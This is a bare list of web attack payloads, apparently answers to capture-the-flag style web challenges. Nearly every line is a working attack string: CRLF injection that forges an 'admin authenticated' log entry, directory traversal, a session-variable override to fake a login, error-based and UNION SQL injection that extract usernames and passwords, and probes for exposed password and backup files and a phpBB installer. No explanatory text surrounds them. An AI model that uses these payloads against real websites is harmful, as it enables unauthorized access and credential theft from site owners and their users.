index.php?username=admin%20authenticated.%0D%0AMeyo&password=n
/galerie/86hwnX2r/password.txt
/?c=admin
/admin/backup/admin.txt
?url=https://google.fr&h=0edf27c83d4aa4699c0625d27be0e371
/phpbb/install/install.php
/?files=../admin&f=index.php
/?_SESSION[logged]=1
/?action=contents&order=ASC%20LIMIT%20(SELECT%20cast(cast((SELECT%20string_agg(concat(us3rn4m3_c0l,$$%20:$$,p455w0rd_c0l),$$,$$)%20FROM%20m3mbr35t4bl3%20LIMIT%201)%20as%20text)%20as%20bigint))
/?action=news&news_id=1%20union%20select%20null,%20username,%20password%20FROM%20users%20;
